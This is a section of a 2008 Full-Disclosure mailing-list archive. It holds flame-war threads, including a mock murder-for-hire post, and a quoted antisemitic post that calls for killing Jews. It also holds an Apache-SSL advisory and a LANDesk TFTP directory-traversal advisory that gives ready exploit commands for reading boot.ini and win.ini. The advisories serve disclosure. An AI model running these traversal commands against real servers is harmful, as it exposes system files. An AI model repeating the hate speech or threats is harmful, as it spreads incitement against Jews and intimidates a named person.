colour of the AK-47 i believe has been paid to come
off before the concourse, i can't help but realize
just HOW MANY of the SANS people paid their donations
to this worthwhile cause. I also wonder if n3td3v
thought the CIA would allow him to continue his
campaign of hate.

Maybe the FUD will stop and we can all get on with
whatever we were doing before the n3td3v agenda. 

--- n3td3v <xploitable at gmail.com> wrote:

> On Mon, Mar 31, 2008 at 4:00 AM, 
> <Valdis.Kletnieks at vt.edu> wrote:
> > On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
> >
> >  > Why are they announcing podcasts when both Joel
> Esler and Johannes
> >  > Ullrich have a privacy breach still to
> publically acknowledge and
> >  > apologize for?
> >
> >  Umm.. maybe because, despite what you may think,
> your little pissing contest
> >  with Joel and Johannes doesn't qualify as a "oh
> my ghod, let's drop *everything*
> >  and shut down the entire workflow and not do a
> single damned thing until this
> >  issue is resolved".
> 
> They aren't busy or getting on with business, they
> have obviously
> snubbed the n3td3v agenda.
> 
> Joel Esler is back on duty,
> http://isc.sans.org/diary.html?storyid=4225 he
> obviously hasn't been
> sacked and he is talking about April Fools Day.
> 
> I'm mighty angry,
> 
> n3td3v
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
> 



      __________________________________________________________
Sent from Yahoo! Mail.
A Smarter Inbox http://uk.docs.yahoo.com/nowyoucan.html



From jeff.stebelton at gmail.com  Wed Apr  2 12:41:26 2008
From: jeff.stebelton at gmail.com (Jeff Stebelton)
Date: Wed, 02 Apr 2008 07:41:26 -0400
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
References: <mailman.702.1206122051.10081.full-disclosure@lists.grok.org.uk>	<200803211614.11815.atlas@r4780y.com>	<4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com>	<b25f08e40803230344g2dc116efn7a57d19ecbc5099f@mail.gmail.com>	<4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com>	<20605.1206932416@turing-police.cc.vt.edu>
	<4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
Message-ID: <47F370E6.50301@gmail.com>

Actually, they are getting on with their business, keeping thousands of 
network security professionals informed and updated. What they aren't 
doing is engaging in childish postings to listservs, silly braggadocio, 
and generally making a fool of themselves.  When you are  good at what  
you do, your work speaks for you, and you don't need to  fill up 
people's inboxes with rants and rambling calls for action from the White 
House (that one split my side laughing). "In the Presidents Early Bird 
briefings today is yet another serious cyberwarfare warning from that 
accomplished and respected security researcher, n3td3v. Mark this Top 
Priority and make sure he sees it first thing!". This is what you put up 
with to have unmoderated lists.

n3td3v wrote:
> On Mon, Mar 31, 2008 at 4:00 AM,  <Valdis.Kletnieks at vt.edu> wrote:
>   
>> On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
>>
>>  > Why are they announcing podcasts when both Joel Esler and Johannes
>>  > Ullrich have a privacy breach still to publically acknowledge and
>>  > apologize for?
>>
>>  Umm.. maybe because, despite what you may think, your little pissing contest
>>  with Joel and Johannes doesn't qualify as a "oh my ghod, let's drop *everything*
>>  and shut down the entire workflow and not do a single damned thing until this
>>  issue is resolved".
>>     
>
> They aren't busy or getting on with business, they have obviously
> snubbed the n3td3v agenda.
>
> Joel Esler is back on duty,
> http://isc.sans.org/diary.html?storyid=4225 he obviously hasn't been
> sacked and he is talking about April Fools Day.
>
> I'm mighty angry,
>
> n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>   



From cfp2008 at recon.cx  Wed Apr  2 12:41:55 2008
From: cfp2008 at recon.cx (Recon Conference)
Date: Wed, 02 Apr 2008 07:41:55 -0400
Subject: [Full-disclosure] Recon 2008 CFP last call, early registration open
Message-ID: <47F37103.7020603@recon.cx>

+                    +                     +         +                                +                  +           +
      +                                             +
                                   \ /
                  +     _        - _+_ -                   ,__
    _=.    .:.         /=\       _|===|_                  ||::|
   |  |    _|.        |   |     | |   | |     __===_  -=- ||::|
   |==|   |  |  __    |.:.|   /\| |:. | |    |   | .|| : |||::|
   |  |-  |.:|_|. :__ |.: |--|==| |  .| |_   | ' |. ||.  |||:.|
 __|. | |_|. | |.|...||---|  |==| |   | | |_--.     ||   |||. |
|  |  |   |. | | |::.||: .|  |==| | . : |=|===|    :|| . ||| .|
|:.| .|   |  | | |:.:|| . |  |==| |     |=|===| .   |'   | |  |
|     |      |   |   |'           :   .   |   ;     ;    '    |
'     :      `   :   '            .       '  .      .         :
'     .                   R E C O N     2 0 0 8     .
                        http://recon.cx/2008/
`                .                .                           '     .
                           june 13 to 15, 2008
                             montreal, quebec 


 + The early registration for the conference is now open.

 + We are offering three training courses this year.

    -Advanced Reverse Engineering by Nicolas Brulez
    -Binary vulnerabilities and Exploit Writing by Gerardo 'gera' Richarte
    -Binary Literacy: Static Reverse Engineering by Rolf Rolles

     check http://recon.cx/2008/training.html for more details

 + There is one month left before the end of the call for paper check http://recon.cx/2008/recon2008-cfp.txt for details    

ATH0++
N0 C4RR13R



From thecmac at gmail.com  Wed Apr  2 11:23:07 2008
From: thecmac at gmail.com (Cassidy MacFarlane)
Date: Wed, 2 Apr 2008 11:23:07 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
Message-ID: <c251dbae0804020323x88b396ds64edb77d235dfa3@mail.gmail.com>

"Youre playing with fire. Fire that cannot be put out with words but
 only inflame the situation of which you are misinformed."
- n3td3v

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of
Micheal Turner
Sent: 02 April 2008 11:03
To: n3td3v; Valdis.Kletnieks at vt.edu; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] sans handler gives out n3td3v e-mail to public

Once upon a time in toy town, I offered to contract
the services of a professional hit-man to have n3td3v
executed - in part a joke, my black humour. However, I
have received so many donations from various gmail.com
addresses that I have just been able to purchase my
first car with the left-over change. As I type this
from my Lamborghini Diablo parked up in a car park at
London's heathrow eagerly awaiting the arrival of
"Aghbad", a delightful eastern european chap with a
pretty impressive handlebar mustache which matches the
colour of the AK-47 i believe has been paid to come
off before the concourse, i can't help but realize
just HOW MANY of the SANS people paid their donations
to this worthwhile cause. I also wonder if n3td3v
thought the CIA would allow him to continue his
campaign of hate.

Maybe the FUD will stop and we can all get on with
whatever we were doing before the n3td3v agenda.

--- n3td3v <xploitable at gmail.com> wrote:

> On Mon, Mar 31, 2008 at 4:00 AM,
> <Valdis.Kletnieks at vt.edu> wrote:
> > On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
> >
> >  > Why are they announcing podcasts when both Joel
> Esler and Johannes
> >  > Ullrich have a privacy breach still to
> publically acknowledge and
> >  > apologize for?



From mikie.simpson at gmail.com  Wed Apr  2 14:14:36 2008
From: mikie.simpson at gmail.com (Michael Simpson)
Date: Wed, 2 Apr 2008 14:14:36 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <c251dbae0804020323x88b396ds64edb77d235dfa3@mail.gmail.com>
References: <c251dbae0804020323x88b396ds64edb77d235dfa3@mail.gmail.com>
Message-ID: <82abd3a70804020614r504fd633mbf75a8cdde17564d@mail.gmail.com>

On 4/2/08, Cassidy MacFarlane <thecmac at gmail.com> wrote:
> "Youre playing with fire. Fire that cannot be put out with words but
>  only inflame the situation of which you are misinformed."
> - n3td3v
>
lolz

and the classic:

Hello Mi5, Mi6, Symantec


I have information regarding Yahoo


Reference:
http://groups.google.com/group/n3td3v/browse_wank/thread/7b60d3fbd0eb9a77/7d1f85fbe122fb29#7d1f85fbe122fb29


I used to be his friend but now he fell out with me, so I want to tell
everyone about him, because he's a yahoo employee i used to give
"intelligence" to, but now he backstabbed me, and he miscalculated how
much i knew about him and his "circle of friends".


He works for Yahoo


Contact me on e-mail and we can exchange phone numbers mibbe go out
for a meal, circle-jerk &c


Regards,


n3td3v



From bambenek.infosec at gmail.com  Wed Apr  2 16:34:30 2008
From: bambenek.infosec at gmail.com (John C. A. Bambenek, GCIH, CISSP)
Date: Wed, 2 Apr 2008 10:34:30 -0500
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <639063.889.qm@web23315.mail.ird.yahoo.com>
References: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
	<639063.889.qm@web23315.mail.ird.yahoo.com>
Message-ID: <e172cd090804020834t4a44ce55y2f5f8c019c4ba6d3@mail.gmail.com>

http://www.allfordmustangs.com/photopost/data/3243/Lambo-Doors-So-Played-Out.jpg

That's all I got.

On Wed, Apr 2, 2008 at 5:02 AM, Micheal Turner <wh1t3h4t3 at yahoo.co.uk>
wrote:

> Once upon a time in toy town, I offered to contract
> the services of a professional hit-man to have n3td3v
> executed - in part a joke, my black humour. However, I
> have received so many donations from various gmail.com
> addresses that I have just been able to purchase my
> first car with the left-over change. As I type this
> from my Lamborghini Diablo parked up in a car park at
> London's heathrow eagerly awaiting the arrival of
> "Aghbad", a delightful eastern european chap with a
> pretty impressive handlebar mustache which matches the
> colour of the AK-47 i believe has been paid to come
> off before the concourse, i can't help but realize
> just HOW MANY of the SANS people paid their donations
> to this worthwhile cause. I also wonder if n3td3v
> thought the CIA would allow him to continue his
> campaign of hate.
>
> Maybe the FUD will stop and we can all get on with
> whatever we were doing before the n3td3v agenda.
>
> --- n3td3v <xploitable at gmail.com> wrote:
>
> > On Mon, Mar 31, 2008 at 4:00 AM,
> > <Valdis.Kletnieks at vt.edu> wrote:
> > > On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
> > >
> > >  > Why are they announcing podcasts when both Joel
> > Esler and Johannes
> > >  > Ullrich have a privacy breach still to
> > publically acknowledge and
> > >  > apologize for?
> > >
> > >  Umm.. maybe because, despite what you may think,
> > your little pissing contest
> > >  with Joel and Johannes doesn't qualify as a "oh
> > my ghod, let's drop *everything*
> > >  and shut down the entire workflow and not do a
> > single damned thing until this
> > >  issue is resolved".
> >
> > They aren't busy or getting on with business, they
> > have obviously
> > snubbed the n3td3v agenda.
> >
> > Joel Esler is back on duty,
> > http://isc.sans.org/diary.html?storyid=4225 he
> > obviously hasn't been
> > sacked and he is talking about April Fools Day.
> >
> > I'm mighty angry,
> >
> > n3td3v
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> >
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> > http://secunia.com/
> >
>
>
>
>       __________________________________________________________
> Sent from Yahoo! Mail.
> A Smarter Inbox http://uk.docs.yahoo.com/nowyoucan.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/61e28c72/attachment.html 

From Glenn.Everhart at chase.com  Wed Apr  2 15:22:06 2008
From: Glenn.Everhart at chase.com (Glenn.Everhart at chase.com)
Date: Wed, 2 Apr 2008 10:22:06 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
Message-ID: <C6AF3ECACA6E9A46A2CB2FABCDCB35C40CE9ADF7@swilnts810.wil.fusa.com>

The atrocities in Canaan reported about places like Jericho and Ai happened something like 3 millennia ago now; time to
get over them, and remember there may be statements in the Bible which are not divinely inspired. In fact the Bible says
there are. See for example Jeremiah 8:8 which I have seen translated as roughly:
   "How can you say 'we are wise, for we have Yahweh's Torah' when it was written for a lie, by the lying pens of scribes"
 
The tales of Ai and Jericho and so on that come down to us do let us know the Bible narration has survived pretty well
intact, not been cleaned up or prettied up as happens with so many narrations with unpleasant acts done by the protagonists.
 
The later prophets gave a much more worthy picture of how God wants us to act, as did Christ. 
 
Yes, there are people who claim their religion advocates killing all other groups, disposessing them, stealing from them,
etc. etc. but people like that tend to have lives that are (as Hobbes put it) nasty, brutish, and short.  Remembering ancient
feuds and wrongs particularly after so long a time is a good way to claim such a fate also. Thus folks should have a care
about feeding old feuds too.
 
-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk]On Behalf Of Andrew A
Sent: Tuesday, April 01, 2008 7:22 PM
To: Full Disclosure
Subject: [Full-disclosure] Greedy Jews fact of the day


"And it shall be, when the LORD thy God shall bring thee into the land which He swore unto thy fathers, to Abraham, to Isaac, and to Jacob, to give thee--great and goodly cities, which thou didst not build, and houses full of all good things, which thou didst not fill, and cisterns hewn out, which thou didst not hew, vineyards and olive-trees, which thou didst not plant, and thou shalt eat and be satisfied."

These verses from Deuteronomy chapter 6 are written on a piece of parchment and placed in a box which is hung outside the house of every Jew that keeps the covenant. 

And so they have accomplished, in the United States of America. The subprime crises and resulting bailouts (at our expense by our national reserve bank, which is headed by an Orthodox Jew serving a board of Orthodox Jews) are going to create thousands of empty homes and plots of arable land owned by investment banking institutions that are owned exclusively by Orthodox Jews.

Why should we leave a single follower of such a filthy, greedy religion alive? Do any of you have an idea?

I pray to you, the Lord my God, to help me destroy the Jewish meme. Every single follower of this arrogant and horrible idea should have their gold exchanged for flying pieces of lead and steel. Let the Jews take what they have reaped and sown-- death, destruction and hatred. 



-----------------------------------------
This transmission may contain information that is privileged,
confidential, legally privileged, and/or exempt from disclosure
under applicable law.  If you are not the intended recipient, you
are hereby notified that any disclosure, copying, distribution, or
use of the information contained herein (including any reliance
thereon) is STRICTLY PROHIBITED.  Although this transmission and
any attachments are believed to be free of any virus or other
defect that might affect any computer system into which it is
received and opened, it is the responsibility of the recipient to
ensure that it is virus free and no responsibility is accepted by
JPMorgan Chase & Co., its subsidiaries and affiliates, as
applicable, for any loss or damage arising in any way from its use.
 If you received this transmission in error, please immediately
contact the sender and destroy the material in its entirety,
whether in electronic or hard copy format. Thank you.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/dc1d9898/attachment.html 

From adam at algroup.co.uk  Wed Apr  2 17:19:47 2008
From: adam at algroup.co.uk (Adam Laurie)
Date: Wed, 02 Apr 2008 17:19:47 +0100
Subject: [Full-disclosure] ANNOUNCE: Apache-SSL security release -
	apache_1.3.41+ssl_1.59
Message-ID: <47F3B223.1000404@algroup.co.uk>

Folks,

Following information/research provided by Alexander Klink, a new 
release is out, fixing a low priority security issue as detailed below. 
The release is on the primary Apache-SSL ftp server and should hit the 
mirrors over the next few hours, according to their schedules.

See http://www.apache-ssl.org for mirrors.

Advisory follows:

============================================
||| Security Advisory AKLINK-SA-2008-005 |||
||| CVE-2008-0555 (CVE candidate)        |||
============================================

Apache-SSL memory disclosure
============================

Date released: 02.04.2008
Date reported: 17.01.2008
$Revision: 1.1 $

by Alexander Klink
    Cynops GmbH
    a.klink at cynops.de
    https://www.cynops.de/advisories/CVE-2008-0555.txt
    (S/MIME signed: 
https://www.cynops.de/advisories/CVE-2008-0555-signed.txt)
    https://www.klink.name/security/aklink-sa-2008-005-apache-ssl.txt
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0555

Vendor: Adam & Ben Laurie
Product: Apache-SSL
Website: http://www.apache-ssl.org
Vulnerability: memory disclosure, potential privilege escalation in web
                applications
Class: remote
Status: patched
Severity: low
Releases known to be affected: apache_1.3.34+ssl_1.57
Releases known NOT to be affected: apache_1.3.41+ssl_1.59

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

Apache-SSL is a secure Webserver, based on Apache and SSLeay/OpenSSL.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

Apache-SSL provides environment variables that are filled with
(client) certificate data. If the subject of a client certificate
contains special characters, parts of these variables can be overwritten
or be filled with other parts of memory.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

The certificate DN as returned by the OpenSSL X509_NAME_online is
passed into the following function:

static void ExpandCert(pool *p,table *pEnv,char *szPrefix, char *szDN, 
char *szCert)
     {
     char buf[HUGE_STRING_LEN];
     char *s,*t;
     /* Expand a X509_oneline entry into it's base components and register
        them as environment variables. Needed if you want to pass 
certificate
        information to CGI's. The naming convention SHOULD be fairly 
compatible
        with CGI's written for stronghold's certificate info  - Q */
     /* FIXME - strtok() and strcspn() may cause problems on some 
systems - Q */

     ap_table_setn(pEnv,szDN,ap_pstrdup(p,szCert));

     ap_cpystrn(buf,szCert,sizeof buf);
     for(s=strtok(buf,"/") ; s != NULL ; s=strtok(NULL,"/"))
         {
         int n=strcspn(s,"=");
         s[n]='\0';
         StrUpper(s);
         t=ap_pstrcat(p,szPrefix,s,NULL);
         ap_table_setn(pEnv,t,ap_pstrdup(p,s+n+1));
         }
     }

The function assumes that the relative distinguished name does not
contain a '/'. If a / is contained in for example the common name,
strcspn(s,"=") returns the size of s, so s+n+1 points beyond the
current token.
Furthermore, environment variables can be overwritten by including '/'
and '='. For example, to overwrite the OPENSSL_S_CLIENT_DN_OU variable,
one could use a certificate with a CN of "/OU=Fake OU".
If an application relies on this information to distinguish certificates
into different authorization classes, it can be fooled this way.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

* 17.01.2008: Reported the bug to Ben Laurie
* 17.01.2008: Ben replies and acknowledges the bug
* 01.02.2008: Checking back with Ben on the status
* 01.02.2008: Ben replies that he'll be looking into a patch over the 
weekend
* 06.02.2008: Ben sends patch and asks for help with testing it
* 07.02.2008: Reply with test results (still a small problem unrelated to
               the original issue)
* 09.02.2008: Ben sends updated patch
* 11.02.2008: Told Ben that patch works fine
* 18.02.2008: Requested update
* 18.02.2008: Ben replies that he'll deal with it in the next week or so
* 27.02.2008: Requested update
* 27.02.2008: Patch for Apache 1.3.41 is ready, but release is normally
               managed by Adam Laurie, who is on holiday till March, 11th
* 28.02.2008: Agreed to wait for Adam to return
* 12.03.2008: Ben informs Adam of the new release
* 25.03.2008: Requested update
* 25.03.2008: Ben replies, they are waiting for an updated advisory from me
* 25.03.2008: Sent out updated advisory
* 27.03.2008: Adam says sorry for the delays and that he will try to work
               on this while he is at "a conference in Amsterdam"
* 01.04.2008: Coordination with Adam and Ben on a release

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

Upgrade to apache_1.3.41+ssl_1.59.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery)


cheers,
Adam
-- 
Adam Laurie                         Tel: +44 (0) 1304 814800
The Bunker Secure Hosting Ltd.      Fax: +44 (0) 1304 814899
Ash Radar Station
Marshborough Road
Sandwich                            mailto:adam at algroup.co.uk
Kent
CT13 0PL
UNITED KINGDOM                      PGP key on keyservers



From razishaban at gmail.com  Wed Apr  2 18:20:44 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Wed, 2 Apr 2008 20:20:44 +0300
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <C6AF3ECACA6E9A46A2CB2FABCDCB35C40CE9ADF7@swilnts810.wil.fusa.com>
References: <C6AF3ECACA6E9A46A2CB2FABCDCB35C40CE9ADF7@swilnts810.wil.fusa.com>
Message-ID: <2d792fb20804021020s6295e849i704f8d4d0ac2abb1@mail.gmail.com>

Quick question:
What does any of this have to do with "Full Disclosure"?
Are any of you disclosing anything?

--
Razi

On 4/2/08, Glenn.Everhart at chase.com <Glenn.Everhart at chase.com> wrote:
>
>
> The atrocities in Canaan reported about places like Jericho and Ai happened
> something like 3 millennia ago now; time to
> get over them, and remember there may be statements in the Bible which are
> not divinely inspired. In fact the Bible says
> there are. See for example Jeremiah 8:8 which I have seen translated as
> roughly:
>    "How can you say 'we are wise, for we have Yahweh's Torah' when it was
> written for a lie, by the lying pens of scribes"
>
> The tales of Ai and Jericho and so on that come down to us do let us know
> the Bible narration has survived pretty well
> intact, not been cleaned up or prettied up as happens with so many
> narrations with unpleasant acts done by the protagonists.
>
> The later prophets gave a much more worthy picture of how God wants us to
> act, as did Christ.
>
> Yes, there are people who claim their religion advocates killing all other
> groups, disposessing them, stealing from them,
> etc. etc. but people like that tend to have lives that are (as Hobbes put
> it) nasty, brutish, and short.  Remembering ancient
> feuds and wrongs particularly after so long a time is a good way to claim
> such a fate also. Thus folks should have a care
> about feeding old feuds too.
>
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk]On Behalf
> Of Andrew A
> Sent: Tuesday, April 01, 2008 7:22 PM
> To: Full Disclosure
> Subject: [Full-disclosure] Greedy Jews fact of the day
>
> "And it shall be, when the LORD thy God shall bring thee into the land which
> He swore unto thy fathers, to Abraham, to Isaac, and to Jacob, to give
> thee--great and goodly cities, which thou didst not build, and houses full
> of all good things, which thou didst not fill, and cisterns hewn out, which
> thou didst not hew, vineyards and olive-trees, which thou didst not plant,
> and thou shalt eat and be satisfied."
>
> These verses from Deuteronomy chapter 6 are written on a piece of parchment
> and placed in a box which is hung outside the house of every Jew that keeps
> the covenant.
>
> And so they have accomplished, in the United States of America. The subprime
> crises and resulting bailouts (at our expense by our national reserve bank,
> which is headed by an Orthodox Jew serving a board of Orthodox Jews) are
> going to create thousands of empty homes and plots of arable land owned by
> investment banking institutions that are owned exclusively by Orthodox Jews.
>
> Why should we leave a single follower of such a filthy, greedy religion
> alive? Do any of you have an idea?
>
> I pray to you, the Lord my God, to help me destroy the Jewish meme. Every
> single follower of this arrogant and horrible idea should have their gold
> exchanged for flying pieces of lead and steel. Let the Jews take what they
> have reaped and sown-- death, destruction and hatred.
>
> ________________________________
>
>
>  This transmission may contain information that is privileged, confidential,
> legally privileged, and/or exempt from disclosure under applicable law. If
> you are not the intended recipient, you are hereby notified that any
> disclosure, copying, distribution, or use of the information contained
> herein (including any reliance thereon) is STRICTLY PROHIBITED. Although
> this transmission and any attachments are believed to be free of any virus
> or other defect that might affect any computer system into which it is
> received and opened, it is the responsibility of the recipient to ensure
> that it is virus free and no responsibility is accepted by JPMorgan Chase &
> Co., its subsidiaries and affiliates, as applicable, for any loss or damage
> arising in any way from its use. If you received this transmission in error,
> please immediately contact the sender and destroy the material in its
> entirety, whether in electronic or hard copy format. Thank you.
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From aluigi at autistici.org  Wed Apr  2 19:42:47 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Wed, 2 Apr 2008 20:42:47 +0200
Subject: [Full-disclosure] Directory traversal in LANDesk Management Suite
	8.80.1.1
Message-ID: <20080402204247.42f3819c.aluigi@autistici.org>


#######################################################################

                             Luigi Auriemma

Application:  LANDesk Management Suite
              http://www.landesk.com/products/ldms/index.aspx
Versions:     <= 8.80.1.1
Platforms:    Windows
Bug:          directory traversal
Exploitation: remote
Date:         01 Apr 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


LANDesk is a well known system management software.


#######################################################################

======
2) Bug
======


The PXE TFTP Service is vulnerable to a classical directory traversal
vulnerability exploitable through the adding of one or more chars
before the usual dotdot pattern.

The interesting thing is that version 8.80.1.1 has been released just
to fix another directory traversal vulnerability.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/tftpx.zip

  tftpx SERVER x\..\..\..\..\..\..\..\boot.ini none
  tftpx SERVER what_you_want/../../../../../../../windows/win.ini none


#######################################################################

======
4) Fix
======


No fix


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org



From tbiehn at gmail.com  Wed Apr  2 20:52:55 2008
From: tbiehn at gmail.com (T Biehn)
Date: Wed, 2 Apr 2008 15:52:55 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d792fb20804021020s6295e849i704f8d4d0ac2abb1@mail.gmail.com>
References: <C6AF3ECACA6E9A46A2CB2FABCDCB35C40CE9ADF7@swilnts810.wil.fusa.com>
	<2d792fb20804021020s6295e849i704f8d4d0ac2abb1@mail.gmail.com>
Message-ID: <2d6724810804021252g36b10ff3x7d1698b4c56b7804@mail.gmail.com>

That you're a douche maybe.

On Wed, Apr 2, 2008 at 1:20 PM, Razi Shaban <razishaban at gmail.com> wrote:
> Quick question:
>  What does any of this have to do with "Full Disclosure"?
>  Are any of you disclosing anything?
>
>  --
>  Razi
>
>
>
>  On 4/2/08, Glenn.Everhart at chase.com <Glenn.Everhart at chase.com> wrote:
>  >
>  >
>  > The atrocities in Canaan reported about places like Jericho and Ai happened
>  > something like 3 millennia ago now; time to
>  > get over them, and remember there may be statements in the Bible which are
>  > not divinely inspired. In fact the Bible says
>  > there are. See for example Jeremiah 8:8 which I have seen translated as
>  > roughly:
>  >    "How can you say 'we are wise, for we have Yahweh's Torah' when it was
>  > written for a lie, by the lying pens of scribes"
>  >
>  > The tales of Ai and Jericho and so on that come down to us do let us know
>  > the Bible narration has survived pretty well
>  > intact, not been cleaned up or prettied up as happens with so many
>  > narrations with unpleasant acts done by the protagonists.
>  >
>  > The later prophets gave a much more worthy picture of how God wants us to
>  > act, as did Christ.
>  >
>  > Yes, there are people who claim their religion advocates killing all other
>  > groups, disposessing them, stealing from them,
>  > etc. etc. but people like that tend to have lives that are (as Hobbes put
>  > it) nasty, brutish, and short.  Remembering ancient
>  > feuds and wrongs particularly after so long a time is a good way to claim
>  > such a fate also. Thus folks should have a care
>  > about feeding old feuds too.
>  >
>  > -----Original Message-----
>  > From: full-disclosure-bounces at lists.grok.org.uk
>  > [mailto:full-disclosure-bounces at lists.grok.org.uk]On Behalf
>  > Of Andrew A
>  > Sent: Tuesday, April 01, 2008 7:22 PM
>  > To: Full Disclosure
>  > Subject: [Full-disclosure] Greedy Jews fact of the day
>  >
>  > "And it shall be, when the LORD thy God shall bring thee into the land which
>  > He swore unto thy fathers, to Abraham, to Isaac, and to Jacob, to give
>  > thee--great and goodly cities, which thou didst not build, and houses full
>  > of all good things, which thou didst not fill, and cisterns hewn out, which
>  > thou didst not hew, vineyards and olive-trees, which thou didst not plant,
>  > and thou shalt eat and be satisfied."
>  >
>  > These verses from Deuteronomy chapter 6 are written on a piece of parchment
>  > and placed in a box which is hung outside the house of every Jew that keeps
>  > the covenant.
>  >
>  > And so they have accomplished, in the United States of America. The subprime
>  > crises and resulting bailouts (at our expense by our national reserve bank,
>  > which is headed by an Orthodox Jew serving a board of Orthodox Jews) are
>  > going to create thousands of empty homes and plots of arable land owned by
>  > investment banking institutions that are owned exclusively by Orthodox Jews.
>  >
>  > Why should we leave a single follower of such a filthy, greedy religion
>  > alive? Do any of you have an idea?
>  >
>  > I pray to you, the Lord my God, to help me destroy the Jewish meme. Every
>  > single follower of this arrogant and horrible idea should have their gold
>  > exchanged for flying pieces of lead and steel. Let the Jews take what they
>  > have reaped and sown-- death, destruction and hatred.
>  >
>  > ________________________________
>  >
>  >
>  >  This transmission may contain information that is privileged, confidential,
>  > legally privileged, and/or exempt from disclosure under applicable law. If
>  > you are not the intended recipient, you are hereby notified that any
>  > disclosure, copying, distribution, or use of the information contained
>  > herein (including any reliance thereon) is STRICTLY PROHIBITED. Although
>  > this transmission and any attachments are believed to be free of any virus
>  > or other defect that might affect any computer system into which it is
>  > received and opened, it is the responsibility of the recipient to ensure
>  > that it is virus free and no responsibility is accepted by JPMorgan Chase &
>  > Co., its subsidiaries and affiliates, as applicable, for any loss or damage
>  > arising in any way from its use. If you received this transmission in error,
>  > please immediately contact the sender and destroy the material in its
>  > entirety, whether in electronic or hard copy format. Thank you.
>
>
> > _______________________________________________
>  >  Full-Disclosure - We believe in it.
>  >  Charter:
>  > http://lists.grok.org.uk/full-disclosure-charter.html
>  >  Hosted and sponsored by Secunia - http://secunia.com/
>  >
>
>  _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From mastahflank at gmail.com  Wed Apr  2 21:02:03 2008
From: mastahflank at gmail.com (=?utf-8?B?am9zaA==?=)
Date: Wed, 2 Apr 2008 20:02:03 +0000
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d6724810804021252g36b10ff3x7d1698b4c56b7804@mail.gmail.com>
References: <C6AF3ECACA6E9A46A2CB2FABCDCB35C40CE9ADF7@swilnts810.wil.fusa.com><2d792fb20804021020s6295e849i704f8d4d0ac2abb1@mail.gmail.com><2d6724810804021252g36b10ff3x7d1698b4c56b7804@mail.gmail.com>
Message-ID: <70801963-1207166525-cardhu_decombobulator_blackberry.rim.net-2143400864-@bxe032.bisx.prod.on.blackberry>

Or that this is off-topic, maybe?
Sent from my BlackBerry? smartphone with SprintSpeed

-----Original Message-----
From: "T Biehn" <tbiehn at gmail.com>

Date: Wed, 2 Apr 2008 15:52:55 
To:"Razi Shaban" <razishaban at gmail.com>
Cc:full-disclosure at lists.grok.org.uk,"Glenn.Everhart at chase.com" <Glenn.Everhart at chase.com>
Subject: Re: [Full-disclosure] Greedy Jews fact of the day


That you're a douche maybe.

On Wed, Apr 2, 2008 at 1:20 PM, Razi Shaban <razishaban at gmail.com> wrote:
> Quick question:
>  What does any of this have to do with "Full Disclosure"?
>  Are any of you disclosing anything?
>
>  --
>  Razi
>
>
>
>  On 4/2/08, Glenn.Everhart at chase.com <Glenn.Everhart at chase.com> wrote:
>  >
>  >
